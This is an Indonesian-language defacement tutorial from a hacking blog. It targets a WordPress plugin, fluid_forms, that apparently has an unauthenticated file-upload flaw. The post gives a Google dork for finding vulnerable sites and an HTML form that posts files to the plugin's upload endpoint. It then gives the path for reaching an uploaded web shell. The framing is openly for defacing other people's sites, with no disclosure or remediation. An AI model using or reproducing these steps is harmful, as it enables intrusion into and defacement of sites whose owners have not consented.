Home > Deface > Tutorial > Defece Menggunakan WordPress deface Fluid_forms Upload Vulnerability Exploit

Defece Menggunakan WordPress deface Fluid_forms Upload Vulnerability Exploit

September 19, 2016 Deface, Tutorial

#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/"

Exploit: /wp-content/plugins/fluid_forms/ file upload/server/php/

CSRF , simpan dengan ext .html ya

<form method="POST" action="http://www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button><br/></form>

kalau vuln nanti akan keluar []

Akses shelmu : /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellmu.php

Semoga bermanfaat

No comments

Subscribe to: Post Comments ( Atom )